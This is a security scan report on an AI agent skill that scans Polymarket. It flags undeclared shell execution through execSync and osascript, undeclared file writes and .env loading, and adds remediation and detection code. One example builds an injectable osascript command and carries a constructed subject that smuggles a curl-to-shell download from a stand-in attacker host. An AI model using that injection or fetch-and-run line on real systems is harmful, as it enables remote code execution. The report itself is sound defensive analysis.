Security Decision Report

polymarket-opportunities-scanning

The skill declares only network:READ (public API access), but its code uses shell:WRITE (execSync/osascript) and filesystem:WRITE without disclosing either in the documentation.

Installation-decision priority · Source: manual upload · Scanned: 2026/4/4
Files: 4
IOCs: 3
Undeclared capabilities: 3
Findings: 4
Most direct threat evidence
High · Documentation deception
Shell execution undeclared in SKILL.md

SKILL.md states 'No external API keys required' and implies only network:READ via public fetch. However, send-report.js uses execSync to spawn shell processes and osascript for AppleScript execution — shell:WRITE capability not disclosed.

scripts/send-report.js:47

Why this conclusion

2 of 4 dimensions triggered
Block
Declared vs actual capabilities

3 capabilities or privileged behaviors found beyond those declared.

Review
Hidden execution and outbound connections

3 general-risk artifacts extracted; they need to be judged in context.

Block
Attack chains and high-severity findings

The report contains no attack chain, but 2 high-severity or critical findings.

Review
Dependencies and supply-chain hygiene

Complete dependency information is unavailable; the supply-chain verdict should stay provisional.

How the risk score was raised

Undeclared shell execution via execSync +20

SKILL.md claims no external dependencies and only network:READ, but send-report.js uses execSync to run node commands.

Undeclared osascript execution +15

AppleScript execution via osascript is not declared. osascript runs arbitrary AppleScript, including "do shell script", so this amounts to unrestricted command execution on macOS.

Undeclared filesystem:WRITE +10

scanner.js writes opportunities.json without any declaration in SKILL.md.

Key evidence

High · Documentation deception

Shell execution undeclared in SKILL.md

SKILL.md states 'No external API keys required' and implies only network:READ via public fetch. However, send-report.js uses execSync to spawn shell processes and osascript for AppleScript execution — shell:WRITE capability not disclosed.

scripts/send-report.js:47
Declare shell:WRITE in the SKILL.md capabilities section if shell execution is necessary, and document exactly which commands are executed.

High · Documentation deception

osascript/AppleScript execution undeclared

Email delivery via osascript is not mentioned in SKILL.md. osascript can run arbitrary AppleScript, including "do shell script", so this is a significant attack vector if the .env file is compromised or the script is modified.

scripts/send-report.js:55
Document the osascript usage, or switch to a documented email library (nodemailer, sendgrid) if possible.

Medium · Documentation deception

Filesystem write access not declared

SKILL.md does not mention that scanner.js writes opportunities.json to disk. While legitimate for the use case, this filesystem:WRITE capability should be declared.

scripts/scanner.js:217
Declare filesystem:WRITE in the SKILL.md capabilities section.

Medium · Documentation deception

.env loading not documented

send-report.js loads its configuration from a .env file, but this behavior is not mentioned in the SKILL.md setup instructions (it appears only in references/setup.md).

scripts/send-report.js:15
Document the .env file usage in the SKILL.md setup section.
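The osascript findings above are about disclosure, but the remediation also has a hardening angle: how the subject, body and recipient reach AppleScript decides whether a tampered .env turns into command execution. The following is an added illustration, not code from the scanned skill (the report does not show how send-report.js builds its osascript call): a hypothetical shell-string form that is injectable, beside an argv form for execFileSync that never touches a shell and keeps untrusted values inside AppleScript string literals. The escaping rules and the Mail.app script are assumptions for the example.

```javascript
// Added example, not the skill's own code. Contrasts a shell-concatenated
// osascript invocation with an argv-based one that can be handed to
// child_process.execFileSync("osascript", argv) without a shell.
"use strict";

// Escape a JS string for use inside an AppleScript double-quoted literal.
// AppleScript literals recognise \\ and \" (plus \n, \r, \t), so those are
// the characters that must be escaped; nothing else is interpreted.
function appleScriptString(s) {
  const escaped = String(s)
    .replace(/\\/g, "\\\\")
    .replace(/"/g, '\\"')
    .replace(/\n/g, "\\n")
    .replace(/\r/g, "\\r");
  return '"' + escaped + '"';
}

// Hypothetical unsafe pattern: a single command string for execSync. The
// subject is spliced into a single-quoted shell argument, so a subject that
// contains a quote ends the argument and the rest runs as shell.
function unsafeCommand(to, subject) {
  return (
    "osascript -e 'tell application \"Mail\" to make new outgoing message " +
    `with properties {subject:"${subject}", visible:false}' ` +
    `-- ${to}`
  );
}

// True if a value would break out of a single-quoted shell argument.
function shellBreakout(value) {
  return String(value).includes("'");
}

// Safe pattern: return the argv array for execFileSync("osascript", argv).
// No shell is involved, and every untrusted value is an AppleScript string
// literal, never AppleScript code, so it cannot reach "do shell script".
function mailArgv(to, subject, body) {
  const script = [
    'tell application "Mail"',
    "  set m to make new outgoing message with properties {" +
      `subject:${appleScriptString(subject)}, ` +
      `content:${appleScriptString(body)}, visible:false}`,
    "  tell m to make new to recipient with properties {" +
      `address:${appleScriptString(to)}}`,
    "  send m",
    "end tell",
  ].join("\n");
  return ["-e", script];
}

// Demonstration on a constructed hostile subject (never executed here).
const HOSTILE_SUBJECT = "Report'; curl -s https://attacker.invalid/x | sh; echo '";

function demo() {
  return {
    unsafe: unsafeCommand("ops@example.com", HOSTILE_SUBJECT),
    breakout: shellBreakout(HOSTILE_SUBJECT),
    argv: mailArgv("ops@example.com", HOSTILE_SUBJECT, "Daily opportunities attached."),
  };
}

module.exports = { appleScriptString, unsafeCommand, shellBreakout, mailArgv, demo };
```

The argv form still needs the declaration the findings ask for (shell:WRITE), because osascript itself is a command execution primitive; what it removes is the path from a compromised .env value to a shell. The hostname in the constructed subject is a reserved .invalid name and is not a real indicator.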

Declared vs actual capabilities

Network access · Pass
  Declared: READ · Inferred: READ
  scanner.js:13 fetches gamma-api.polymarket.com
Command execution · Block
  Declared: NONE · Inferred: WRITE
  send-report.js:47 execSync, send-report.js:55 osascript
Filesystem · Block
  Declared: NONE · Inferred: WRITE
  scanner.js:217 fs.writeFileSync
Environment variables · Block
  Declared: NONE · Inferred: READ
  send-report.js:15-24 .env loading
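The table above is the output of a declared-versus-inferred comparison. As an added example, not part of the report's tooling or of the scanned skill, here is a small version of that check in JavaScript: it infers capabilities from source text with line-level patterns, parses a capabilities list from SKILL.md (the "capabilities:" list layout is an assumption), and reports every capability the code exhibits but the manifest does not declare. The sample files are constructed to mirror the findings on this page; the real scanner.js and send-report.js are not reproduced.

```javascript
// Added example, not the report's scanner or the skill's code. Pattern-based
// capability inference over JavaScript sources, diffed against a SKILL.md
// capabilities list. Patterns are deliberately simple and over-approximate
// (e.g. "exec(" also matches RegExp.prototype.exec), so hits are evidence
// for review, which is how the report treats its own artifacts.
"use strict";

// Each rule maps a source pattern to a capability in the report's vocabulary.
const RULES = [
  { cap: "network:READ", re: /\bfetch\s*\(|https?:\/\//, why: "fetch call or URL literal" },
  { cap: "shell:WRITE", re: /\b(exec|execSync|spawn|spawnSync|execFile|execFileSync)\s*\(/, why: "child_process call" },
  { cap: "shell:WRITE", re: /\bosascript\b/, why: "osascript (AppleScript) invocation" },
  { cap: "filesystem:WRITE", re: /\bfs\.(writeFileSync|writeFile|appendFileSync|appendFile|mkdirSync)\s*\(/, why: "fs write" },
  { cap: "env:READ", re: /\.env\b/, why: "process.env or .env file access" },
];

// Returns [{cap, file, line, why}] for every source line matching a rule.
function inferCapabilities(file, source) {
  const hits = [];
  source.split("\n").forEach((text, i) => {
    for (const rule of RULES) {
      if (rule.re.test(text)) hits.push({ cap: rule.cap, file, line: i + 1, why: rule.why });
    }
  });
  return hits;
}

// Parse an assumed SKILL.md block of the form:
//   capabilities:
//     - network:READ
// Returns a Set of declared capability strings (empty if no block is found).
function parseDeclared(skillMd) {
  const declared = new Set();
  const m = skillMd.match(/capabilities:\s*\n((?:\s*-\s*\S+\s*\n?)+)/);
  if (!m) return declared;
  for (const line of m[1].split("\n")) {
    const item = line.replace(/^\s*-\s*/, "").trim();
    if (item) declared.add(item);
  }
  return declared;
}

// Group inferred hits that the manifest does not declare, keyed by capability.
function undeclared(declared, hits) {
  const out = new Map();
  for (const h of hits) {
    if (declared.has(h.cap)) continue;
    if (!out.has(h.cap)) out.set(h.cap, []);
    out.get(h.cap).push(`${h.file}:${h.line} (${h.why})`);
  }
  return out;
}

// Scan a {path: content} map. Markdown supplies declarations; .js supplies hits.
function scanSkill(files) {
  const declared = parseDeclared(files["SKILL.md"] || "");
  let hits = [];
  for (const [path, content] of Object.entries(files)) {
    if (path.endsWith(".js")) hits = hits.concat(inferCapabilities(path, content));
  }
  return { declared, hits, undeclared: undeclared(declared, hits) };
}

// Constructed sample mirroring the report's findings; not the real files.
const SAMPLE = {
  "SKILL.md": "# polymarket-opportunities-scanning\ncapabilities:\n  - network:READ\n",
  "scripts/scanner.js": [
    'const res = await fetch("https://gamma-api.polymarket.com/markets");',
    'fs.writeFileSync("opportunities.json", JSON.stringify(rows, null, 2));',
  ].join("\n"),
  "scripts/send-report.js": [
    'const env = fs.readFileSync(".env", "utf8");',
    'execSync("node scripts/scanner.js");',
    "execSync(\"osascript -e 'tell application \\\"Mail\\\" to send m'\");",
  ].join("\n"),
};

module.exports = { RULES, inferCapabilities, parseDeclared, undeclared, scanSkill, SAMPLE };
```

Running scanSkill(SAMPLE) declares only network:READ and flags shell:WRITE, filesystem:WRITE and env:READ as undeclared, which is the same verdict the table records for the real files; a production version would parse an AST rather than lines, but the comparison step is identical.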

Suspicious artifacts and outbound connections

Medium · External URL
https://polymarket.com/event/...

SKILL.md:65

Medium · External URL
https://gamma-api.polymarket.com

scripts/scanner.js:12

Medium · External URL
https://polymarket.com/event/$

scripts/scanner.js:151

Dependencies and supply chain

No structured dependency alerts.

File composition

4 files · 551 lines
JavaScript: 2 files · 372 lines
Markdown: 2 files · 179 lines
Files needing attention · 3
scripts/scanner.js JavaScript · 237 lines
Filesystem write access not declared · https://gamma-api.polymarket.com · https://polymarket.com/event/$
scripts/send-report.js JavaScript · 135 lines
Shell execution undeclared in SKILL.md · osascript/AppleScript execution undeclared · .env loading not documented
SKILL.md Markdown · 97 lines
https://polymarket.com/event/...
Other files · setup.md

Security highlights

Uses the native fetch API; no external dependencies, so no dependency with known vulnerabilities
No hardcoded credentials or API keys in source code
No base64 obfuscation or suspicious encoding patterns
Legitimate financial data analysis use case with plausible business justification
Output file (opportunities.json) is local and not exfiltrated